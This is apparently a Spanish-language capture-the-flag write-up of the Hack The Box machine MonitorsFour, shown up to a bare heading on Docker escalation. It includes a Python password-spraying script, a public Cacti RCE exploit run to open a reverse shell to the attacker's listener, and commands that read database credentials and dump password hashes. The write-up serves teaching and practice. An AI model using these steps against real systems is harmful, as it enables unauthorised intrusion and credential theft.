MonitorsFour corre un sitio web donde se descubrio una API. Esta, exponia las credenciales de usuarios, lo que permitio el acceso al sitio. Tambien, se encontro Cacti con una vulnerabilidad RCE. Se ejecuto Password Spraying para obtener credenciales validas que permitieron la explotacion y acceso a un contenedor docker. El sitio principal mencionaba la version de docker, la cual se encontro vulnerable, tras la explotacion, se logro acceso privilegiado al almacenamiento host. Finalmente se modifico una tarea programada para obtener acceso privilegiado en el host.

Nombre	MonitorsFour
OS	Windows
Puntos	20
Dificultad	Easy
Fecha de Salida	2025-12-06
IP	10.129.100.42
Maker	TheCyberGeek kavigihan
Rated	{ "type": "bar", "data": { "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"], "datasets": [{ "label": "User Rated Difficulty", "data": [211, 285, 1520, 1673, 875, 346, 239, 74, 32, 92], "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"] }] }, "options": { "scales": { "xAxes": [{"display": false}], "yAxes": [{"display": false}] }, "legend": {"labels": {"fontColor": "white"}}, "responsive": true } }

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y WinRM (5985).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


# Nmap 7.95 scan initiated Sat Dec  6 20:42:07 2025 as: /usr/lib/nmap/nmap --privileged -p80,5985 -sV -sC -oN nmap_scan 10.129.45.249
Nmap scan report for 10.129.45.249
Host is up (0.069s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  6 20:42:19 2025 -- 1 IP address (1 host up) scanned in 12.00 seconds

Web Site

El sitio web nos redirige al dominio monitorsfour.htb el cual agregamos al archivo /etc/hosts.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


❯ curl -sI 10.129.45.249
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 07 Dec 2025 02:42:49 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
Location: http://monitorsfour.htb/

❯

Se describe servicios de Networking.

Existe un formulario para login.

Directory Brute Forcing

feroxbuster muestra contenido estatico, vistas y contenido relacionado a un administrador.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88


❯ feroxbuster -u http://monitorsfour.htb/ -w $CM -x php
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://monitorsfour.htb/
 🚩  In-Scope Url          │ monitorsfour.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l        9w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       11w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        5l       30w     1616c http://monitorsfour.htb/static/images/services/01.png
200      GET        1l      235w    12063c http://monitorsfour.htb/static/images/review.svg
200      GET       71l      130w     1872c http://monitorsfour.htb/static/js/custom.js
200      GET        5l      369w    21003c http://monitorsfour.htb/static/js/popper.min.js
200      GET       24l       99w      770c http://monitorsfour.htb/static/js/smoothscroll.js
200      GET      109l      619w    13655c http://monitorsfour.htb/static/images/service.svg
200      GET       19l       62w     3695c http://monitorsfour.htb/static/images/services/04.png
200      GET        6l       34w     2166c http://monitorsfour.htb/static/images/services/02.png
200      GET       96l      239w     4340c http://monitorsfour.htb/login
200      GET       11l       15w      188c http://monitorsfour.htb/static/css/plugins.css
200      GET        9l       43w     3028c http://monitorsfour.htb/static/images/services/03.png
200      GET       38l      117w     2813c http://monitorsfour.htb/static/js/plugins.js
200      GET        4l     1293w    86709c http://monitorsfour.htb/static/js/jquery-min.js
200      GET        7l      683w    60010c http://monitorsfour.htb/static/js/bootstrap.min.js
200      GET        1l      393w    15974c http://monitorsfour.htb/static/images/about-us.svg
200      GET      935l     1752w    15174c http://monitorsfour.htb/static/css/style.css
200      GET        1l      359w    22207c http://monitorsfour.htb/static/images/banner.svg
200      GET      129l      673w    57007c http://monitorsfour.htb/static/admin/assets/images/logo.png
200      GET        7l      277w    44342c http://monitorsfour.htb/static/js/owl.carousel.min.js
200      GET       87l     1326w   157954c http://monitorsfour.htb/static/admin/assets/images/logo.ico
200      GET      338l      982w    13688c http://monitorsfour.htb/
301      GET        7l       11w      162c http://monitorsfour.htb/controllers => http://monitorsfour.htb/controllers/
200      GET        4l       35w      367c http://monitorsfour.htb/contact
200      GET        2l      210w    12507c http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/pace.min.js
200      GET      607l     1130w    16986c http://monitorsfour.htb/static/admin/assets/js/core/app.js
200      GET        7l      430w    36816c http://monitorsfour.htb/static/admin/assets/js/core/libraries/bootstrap.min.js
200      GET        6l      184w     9227c http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/blockui.min.js
200      GET        1l        1w    37820c http://monitorsfour.htb/static/admin/assets/css/minified/colors.min.css
200      GET     1190l     1226w    47483c http://monitorsfour.htb/static/admin/assets/css/icons/icomoon/styles.css
200      GET        4l     1305w    84345c http://monitorsfour.htb/static/admin/assets/js/core/libraries/jquery.min.js
200      GET        1l     1430w   108349c http://monitorsfour.htb/static/admin/assets/css/minified/core.min.css
200      GET        1l     5059w   256503c http://monitorsfour.htb/static/admin/assets/css/minified/components.min.css
200      GET        1l     1733w   122310c http://monitorsfour.htb/static/admin/assets/css/minified/bootstrap.min.css
200      GET       84l      212w     3099c http://monitorsfour.htb/forgot-password
200      GET     4734l    29110w  2364586c http://monitorsfour.htb/static/admin/assets/images/servers.png
301      GET        7l       11w      162c http://monitorsfour.htb/static => http://monitorsfour.htb/static/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin => http://monitorsfour.htb/static/admin/
200      GET        1l        3w       35c http://monitorsfour.htb/user
301      GET        7l       11w      162c http://monitorsfour.htb/views => http://monitorsfour.htb/views/
301      GET        7l       11w      162c http://monitorsfour.htb/views/admin => http://monitorsfour.htb/views/admin/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets => http://monitorsfour.htb/static/admin/assets/
301      GET        7l       11w      162c http://monitorsfour.htb/static/css => http://monitorsfour.htb/static/css/
200      GET      215l      592w     9229c http://monitorsfour.htb/views/admin/api.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/fonts => http://monitorsfour.htb/static/fonts/
200      GET      197l      537w     8471c http://monitorsfour.htb/views/admin/changelog.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/images => http://monitorsfour.htb/static/images/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/css => http://monitorsfour.htb/static/admin/assets/css/
200      GET      221l      580w     9491c http://monitorsfour.htb/views/admin/customers.php
200      GET      653l     1652w    28212c http://monitorsfour.htb/views/admin/dashboard.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/js => http://monitorsfour.htb/static/js/
200      GET       84l      212w     3099c http://monitorsfour.htb/views/forgot_password.php
200      GET       20l       36w      302c http://monitorsfour.htb/views/admin/footer.php
200      GET      338l      982w    13688c http://monitorsfour.htb/views/index.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/images/blog => http://monitorsfour.htb/static/images/blog/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/images => http://monitorsfour.htb/static/admin/assets/images/
200      GET       96l      239w     4340c http://monitorsfour.htb/views/login.php
200      GET      415l     1069w    19023c http://monitorsfour.htb/views/admin/invoices.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/js => http://monitorsfour.htb/static/admin/assets/js/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/swf => http://monitorsfour.htb/static/admin/assets/swf/
200      GET      217l      573w     9317c http://monitorsfour.htb/views/admin/tasks.php
200      GET      321l      800w    13987c http://monitorsfour.htb/views/admin/users.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/images/services => http://monitorsfour.htb/static/images/services/
❯

Views

Las vistas (views/*) no parecen estar protegidas y, muestra el contenido de distintas paginas, exponiendo funcionalidades de administrador.

El codigo html de api.php muestra un enlace a un endpoint de una API.

1
2
3


<ul class="dropdown-menu dropdown-menu-right">
  <li><a href="/api/v1/logout"><i class="icon-switch2"></i> Logout</a></li>
</ul>

Subdomain Discovery

Tras ejecutar ffuf este muestra el subdominio cacti.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


❯ ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.monitorsfour.htb" -u http://monitorsfour.htb -fl 8

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsfour.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
 :: Header           : Host: FUZZ.monitorsfour.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 8
________________________________________________

cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
❯

API - Website

ffuf muestra multiples endpoints.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


❯ ffuf -w $CM -u http://monitorsfour.htb/api/v1/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsfour.htb/api/v1/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htpasswd               [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 153ms]
.hta                    [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 155ms]
.htaccess               [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 156ms]
auth                    [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
logout                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 406ms]
users                   [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 237ms]
user                    [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 302ms]
:: Progress: [4614/4614] :: Job [1/1] :: 40 req/sec :: Duration: [0:01:03] :: Errors: 0 ::
❯

/users requiere de un token valido.

1
2
3


❯ curl 'http://monitorsfour.htb/api/v1/users'
{"error":"Invalid or missing token"}
❯

Al indicar el valor 0 este devuelve todos los usuarios con su informacion.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56


❯ curl -s 'http://monitorsfour.htb/api/v1/users?token=0' | jq
[
  {
    "id": 2,
    "username": "admin",
    "email": "admin@monitorsfour.htb",
    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
    "role": "super user",
    "token": "8024b78f83f102da4f",
    "name": "Marcus Higgins",
    "position": "System Administrator",
    "dob": "1978-04-26",
    "start_date": "2021-01-12",
    "salary": "320800.00"
  },
  {
    "id": 5,
    "username": "mwatson",
    "email": "mwatson@monitorsfour.htb",
    "password": "69196959c16b26ef00b77d82cf6eb169",
    "role": "user",
    "token": "0e543210987654321",
    "name": "Michael Watson",
    "position": "Website Administrator",
    "dob": "1985-02-15",
    "start_date": "2021-05-11",
    "salary": "75000.00"
  },
  {
    "id": 6,
    "username": "janderson",
    "email": "janderson@monitorsfour.htb",
    "password": "2a22dcf99190c322d974c8df5ba3256b",
    "role": "user",
    "token": "0e999999999999999",
    "name": "Jennifer Anderson",
    "position": "Network Engineer",
    "dob": "1990-07-16",
    "start_date": "2021-06-20",
    "salary": "68000.00"
  },
  {
    "id": 7,
    "username": "dthompson",
    "email": "dthompson@monitorsfour.htb",
    "password": "8d4a7e7fd08555133e056d9aacb1e519",
    "role": "user",
    "token": "0e111111111111111",
    "name": "David Thompson",
    "position": "Database Manager",
    "dob": "1982-11-23",
    "start_date": "2022-09-15",
    "salary": "83000.00"
  }
]
❯

Creamos un wordlist con los usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


❯ curl -s "http://monitorsfour.htb/user?token=0" | jq '[.[] |  .username]'
[
  "admin",
  "mwatson",
  "janderson",
  "dthompson"
]
❯
❯ python usernames.py names.txt >> users.txt
❯ wc -l users.txt
44 users.txt
❯

Crack The Hash

Obtuvimos unicamente los hashes.

1
2
3
4
5
6
7
8
9


❯ curl -s "http://monitorsfour.htb/user?token=0" | jq '[.[] |  .password]'
[
  "56b32eb43e6f15395f6c46c1c9e1cd36",
  "69196959c16b26ef00b77d82cf6eb169",
  "2a22dcf99190c322d974c8df5ba3256b",
  "8d4a7e7fd08555133e056d9aacb1e519",
  "9e8694e99216221dad8f6fd183904504"
]
❯

crackstation muestra el valor del hash del administrador.

Hash	Type	Result
56b32eb43e6f15395f6c46c1c9e1cd36	md5	wonderful1
69196959c16b26ef00b77d82cf6eb169	Unknown	Not found
2a22dcf99190c322d974c8df5ba3256b	Unknown	Not found
8d4a7e7fd08555133e056d9aacb1e519	Unknown	Not found

Admin

Las credenciales dan acceso al dashboard.

Vemos que es posible generar una token para la API.

Existe un historial donde se indican todos los cambios realizados en cada version. Se menciona una vulnerabilidad parcheada y, la version Docker Desktop 4.44.2.

Version	Date	Title	Change	Description
V.1.9	June 2, 2025	API User Integration	API	Integrated API user management with token-based authentication, enabling external systems to automate tasks such as retrieving user data, managing resources, and interacting with the platform securely.
V.1.8	June 1, 2025	API Key Management	API	Implemented secure API key generation and updated the user interface to allow managing API keys. Users can now create keys for programmatic access while maintaining control through the admin dashboard.
V.1.7	May 16, 2025	Infrastructure Notice	Infrastructure	Migrated MonitorsFour infrastructure to Windows and Docker Desktop 4.44.2, enabling containerized deployments for improved portability, scalability, and easier environment management.
V.1.6	May 1, 2025	Security Notice: SQL Injection Patch	Security	Patched an error-based SQL injection vulnerability in the forgotten password form by enforcing secure prepared state stricter input validation.
V.1.5	March 1, 2025	User Enhancements	Users	Added functionality to allow Super Users to create, update, and delete user accounts directly from the user management interface.
V.1.4	February 1, 2024	User Management	Users	Created the users section to display all current users of the web app. Features include role management, user status monitoring, and detailed user activity logs.
V.1.3	January 1, 2024	Customer Management	Customers	Developed the customers section to handle all customer-related information. Features include the ability to add new customers, edit existing profiles, and remove customers from the database.
V.1.2	December 1, 2023	Invoice Tracking	Invoices	Introduced the ability to create and manage invoices. Included features for tracking payment status, due dates, and automatic reminders.
V.1.1	November 1, 2023	Order Management	Tasks	Added functionality to create, update, and monitor tasks related to customer orders. Enhanced the workflow with real-time updates and notifications.
V.1.0	October 1, 2023	Initial release	Dashboard	Initial setup of the dashboard for real-time monitoring and data visualization. Included basic traffic sources, sales statistics, and quick stats.

Cacti

El subdominio cacti muestra la version 1.2.28. Encontramos que esta version es afectada por una vulnerabilidad: CVE-2025-24367. Permite la creacion de archivos para la ejecucion remota de comandos (RCE). Aunque para ello es necesario tener acceso a cacti.

Password Spraying

Utilizamos un script en python para realizar Password Spraying con los usuarios conocidos hacia el login de cacti.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


❯ cat cacti_login.py
import requests
from bs4 import BeautifulSoup

login_url = "http://cacti.monitorsfour.htb/cacti/index.php"
proxies = {'http':'http://127.0.0.1:8080'}

USER = 'users.txt'
PASSWORD = 'wonderful1'

with open(USER, "r") as f:
    for user in f:
        user = user.strip()
        session = requests.Session()
        get_page = session.get(login_url)
        soup = BeautifulSoup(get_page.text, "html.parser")

        csrf_token = soup.find("input", {"name": "__csrf_magic"})["value"]
        data = {    
            "__csrf_magic": csrf_token,
            "action": "login",
            "login_username": user,
            "login_password": PASSWORD
        }
        post_response = session.post(login_url, data=data, proxies=proxies)

        if 'Denied' not in post_response.text:
            print(f"Login as: {user}:{PASSWORD}")
            break
❯

Se logro identificar un par de credenciales validas.

1
2
3


❯ python cacti_login.py
Login as: marcus:wonderful1
❯ 

User - www-data (Docker)

CVE-2025-24367

Clonamos el repositorio CVE-2025-24367-Cacti-PoC que aloja el exploit para la vulnerabilidad anterior mencionada.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


❯ git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git
Cloning into 'CVE-2025-24367-Cacti-PoC'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), 5.35 KiB | 5.35 MiB/s, done.
❯ cd CVE-2025-24367-Cacti-PoC
❯ ll
.rw-rw-r-- kali kali 8.3 KB Sat Dec  6 22:58:27 2025  exploit.py
.rw-rw-r-- kali kali 1.6 KB Sat Dec  6 22:58:27 2025  README.md
❯

La flag -h indica los valores necesarios para la explotacion.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


❯ python exploit.py -h
usage: CVE-2025-24367 - Cacti Authenticated Graph Template RCE [-h] -u USER -p PASSWORD -i IP -l PORT -url URL [--proxy]

options:
  -h, --help            show this help message and exit
  -u, --user USER       Username for login
  -p, --password PASSWORD
                        Password for login
  -i, --ip IP           IP address for reverse shell
  -l, --port PORT       Port number for reverse shell
  -url, --url URL       Base URL of the application
  --proxy               Enable proxy usage (default: http://127.0.0.1:8080)
❯

Se ejecuto el exploit indicando nuestra IP y puerto a la escucha para una shell inversa.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


❯ python exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i 10.10.14.26 -l 1335 --proxy
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: Xp3i2.php
[+] Got payload: /bash
[i] Created PHP filename: ZgsJh.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80
❯

Shell

Con ello obtuvimos una shell como www-data.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.26] from monitorsfour.htb [10.129.45.249] 61427
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
www-data@821fbd6a43fa:~/html/cacti$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/cacti
www-data@821fbd6a43fa:~/html/cacti$

En config.php se definen las variables para la conexion de base de datos de cacti.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44


www-data@821fbd6a43fa:~/html/cacti$ cat include/config.php
cat include/config.php
<?php
/*
 +-------------------------------------------------------------------------+
 | Copyright (C) 2004-2024 The Cacti Group                                 |
 |                                                                         |
 | This program is free software; you can redistribute it and/or           |
 | modify it under the terms of the GNU General Public License             |
 | as published by the Free Software Foundation; either version 2          |
 | of the License, or (at your option) any later version.                  |
 |                                                                         |
 | This program is distributed in the hope that it will be useful,         |
 | but WITHOUT ANY WARRANTY; without even the implied warranty of          |
 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the           |
 | GNU General Public License for more details.                            |
 +-------------------------------------------------------------------------+
 | Cacti: The Complete RRDtool-based Graphing Solution                     |
 +-------------------------------------------------------------------------+
 | This code is designed, written, and maintained by the Cacti Group. See  |
 | about.php and/or the AUTHORS file for specific developer information.   |
 +-------------------------------------------------------------------------+
 | http://www.cacti.net/                                                   |
 +-------------------------------------------------------------------------+
*/

/**
 * Make sure these values reflect your actual database/host/user/password
 */

$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'mariadb';
$database_username = 'cactidbuser';
$database_password = '7pyrf6ly8qx4';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;

# [.. cut ..]

En la raiz descubrimos el archivo .dockerenv lo cual indica que cacti corre en contenedor docker como se indicaba en el changelog.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


www-data@821fbd6a43fa:~/html/cacti$ ls -lah /
total 7.4M
drwxr-xr-x   1 root root 4.0K Dec  7 04:51 .
drwxr-xr-x   1 root root 4.0K Dec  7 04:51 ..
-rwxr-xr-x   1 root root    0 Nov 10 17:04 .dockerenv
lrwxrwxrwx   1 root root    7 Aug 24 16:20 bin -> usr/bin
drwxr-xr-x   2 root root 4.0K Aug 24 16:20 boot
drwxr-xr-x   5 root root  340 Dec  6 22:32 dev
drwxr-xr-x   1 root root 4.0K Nov 10 17:04 etc
drwxr-xr-x   1 root root 4.0K Nov 10 16:15 home
lrwxrwxrwx   1 root root    7 Aug 24 16:20 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Aug 24 16:20 lib64 -> usr/lib64
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 media
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 mnt
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 opt
dr-xr-xr-x 191 root root    0 Dec  6 22:32 proc
drwx------   2 root root 4.0K Nov  3 20:44 root
drwxr-xr-x   1 root root 4.0K Nov 10 17:05 run
lrwxrwxrwx   1 root root    8 Aug 24 16:20 sbin -> usr/sbin
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 srv
-rwxr-xr-x   1 root root  113 Sep 13 06:13 start.sh
dr-xr-xr-x  13 root root    0 Dec  7 05:03 sys
drwxrwxrwt   1 root root 7.3M Dec  7 05:00 tmp
drwxr-xr-x   1 root root 4.0K Nov  3 20:44 usr
drwxr-xr-x   1 root root 4.0K Nov  4 04:06 var
www-data@821fbd6a43fa:~/html/cacti$

Encontramos el codigo fuente de la aplicacion en el dominio principal tambien, las credenciales para la base de datos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


www-data@821fbd6a43fa:~$ ls -lah app
total 36K
drwxr-xr-x 1 www-data www-data 4.0K Oct 30 08:12 .
drwxr-xr-x 1 root     root     4.0K Nov 10 17:01 ..
-rwxr-xr-x 1 www-data www-data   97 Sep 13 05:37 .env
-rwxr-xr-x 1 www-data www-data 2.9K Sep 13 05:31 Router.php
drwxr-xr-x 1 www-data www-data 4.0K Nov 10 17:01 controllers
-rwxr-xr-x 1 www-data www-data 2.3K Sep 13 05:31 index.php
drwxr-xr-x 1 www-data www-data 4.0K Oct 30 08:12 static
drwxr-xr-x 1 www-data www-data 4.0K Oct 30 08:12 views
www-data@821fbd6a43fa:~$ cd app
www-data@821fbd6a43fa:~/app$ cat .env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
www-data@821fbd6a43fa:~/app$

La base de datos tiene registrados la informacion de usuarios anterior observada en la API.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e "show tables;"
<-pf37p2j8f4t0r -D monitorsfour_db -e "show tables;"
Tables_in_monitorsfour_db
changelog
customers
invoice_tasks
invoices
tasks
users
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e "describe users;"
<37p2j8f4t0r -D monitorsfour_db -e "describe users;"
Field	Type	Null	Key	Default	Extra
id	int(11)	NO	PRI	NULL	auto_increment
username	varchar(50)	NO	UNI	NULL	
email	varchar(100)	NO		NULL	
password	varchar(100)	NO		NULL	
role	varchar(50)	NO		user	
token	varchar(255)	YES		NULL	
name	varchar(100)	NO		NULL	
position	varchar(100)	NO		NULL	
dob	date	NO		NULL	
start_date	date	NO		NULL	
salary	decimal(10,2)	NO		NULL	
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e "select username, email, password, role from users;"
<select username, email, password, role from users;"
username	email	password	role
admin	admin@monitorsfour.htb	56b32eb43e6f15395f6c46c1c9e1cd36	super user
mwatson	mwatson@monitorsfour.htb	69196959c16b26ef00b77d82cf6eb169	admin
janderson	janderson@monitorsfour.htb	2a22dcf99190c322d974c8df5ba3256b	user
dthompson	dthompson@monitorsfour.htb	8d4a7e7fd08555133e056d9aacb1e519	user
www-data@821fbd6a43fa:~/app/controllers$

Dentro de la base de datos de Cacti se encontraron dos hashes para usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55


www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e "show tables;"
<ctidbuser -p7pyrf6ly8qx4 -D cacti -e "show tables;"
Tables_in_cacti
aggregate_graph_templates
# [... cut ...]
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_auth_row_cache
user_domains
user_domains_ldap
user_log
vdef
vdef_items
version
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e "describe user_auth;"
<er -p7pyrf6ly8qx4 -D cacti -e "describe user_auth;"
Field	Type	Null	Key	Default	Extra
id	mediumint(8) unsigned	NO	PRI	NULL	auto_increment
username	varchar(50)	NO	MUL	0	
password	varchar(256)	NO			
realm	mediumint(8)	NO	MUL	0	
full_name	varchar(100)	YES		0	
email_address	varchar(128)	YES		NULL	
must_change_password	char(2)	YES		NULL	
password_change	char(2)	YES		on	
show_tree	char(2)	YES		on	
show_list	char(2)	YES		on	
show_preview	char(2)	NO		on	
graph_settings	char(2)	YES		NULL	
login_opts	tinyint(3) unsigned	NO		1	
policy_graphs	tinyint(3) unsigned	NO		1	
policy_trees	tinyint(3) unsigned	NO		1	
policy_hosts	tinyint(3) unsigned	NO		1	
policy_graph_templates	tinyint(3) unsigned	NO		1	
enabled	char(2)	NO	MUL	on	
lastchange	int(11)	NO		-1	
lastlogin	int(11)	NO		-1	
password_history	varchar(4096)	NO		-1	
locked	varchar(3)	NO			
failed_attempts	int(5)	NO		0	
lastfail	int(10) unsigned	NO		0	
reset_perms	int(10) unsigned	NO		0	
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e "select username,password,realm,password_history from user_auth;"
<me,password,realm,password_history from user_auth;"
username	password	realm	password_history
admin	$2y$10$wqlo06C4isr4q9xhqI/UQOpyM/n8EDzYl/GndqhDh/2LQihzPdHWO	0	-1
guest	43e9a4ab75570f5b	0	-1
marcus	$2y$10$bPWlnZYLhoDUawu4x8vLAuCIaDbqIUe4s9t9HqFm/1gtbavD/eKGe	0	
www-data@821fbd6a43fa:~/app/controllers$

root via CVE-2025-9074 (Docker)

